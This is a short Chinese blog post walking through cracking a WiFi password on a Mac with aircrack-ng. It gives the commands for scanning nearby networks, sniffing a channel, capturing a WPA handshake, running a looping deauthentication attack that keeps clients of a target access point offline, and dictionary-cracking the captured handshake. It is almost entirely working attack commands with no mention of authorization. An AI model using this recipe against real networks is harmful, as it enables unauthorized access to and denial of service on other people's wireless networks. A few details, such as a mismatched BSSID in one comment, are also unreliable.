admin管理员组

文章数量:1620393

aircrack-ng(mac)

1.install aircrack-ng

brew install aircrack-ng
# 可能需要 安装macport, 安装Xcode、依赖
# brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

2. 查找网络

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

3. 监听

6的参数可根据查找网络返回RSSI 设置;

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6

假如有Kali,可以发很多请求,让其它设备重连

airodump -w sofia -c 3 wlan0
解释:-w表示保存握手包,“sofia”为包的名称,可随意设置,最终的文件为sofia-01.cap,-c 3表示指定频道3,wlan0指定网卡设备。
airodump -w sofia -c 3 –bssid C8:3A:35:5E:93:C0 wlan0

# 攻击强制掉线连接设备
aireplay-ng -0 0 -a C8:3A:35:5E:93:C0
解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值,上图可以一目了然。

4.查看包

sudo aircrack-ng   /tmp/airportSniff8g0Oex.cap

5. 解密

好字典能快很多,但也只是运气成分; 推荐用Hashcat 提高速度

sudo aircrack-ng -w password.txt -b 88:c3:97:9d:1d:0e /tmp/airportSniffkQQOQ9.cap
# -w:指定字典文件;-b:指定要破解的wifi BSSID。
#-b后面的参数bc:46:99:df:6c:72指的是网卡的BSSID, 最后面的一个文件路径是上一步监听到的数据

本文标签: 攻防密码网络wifi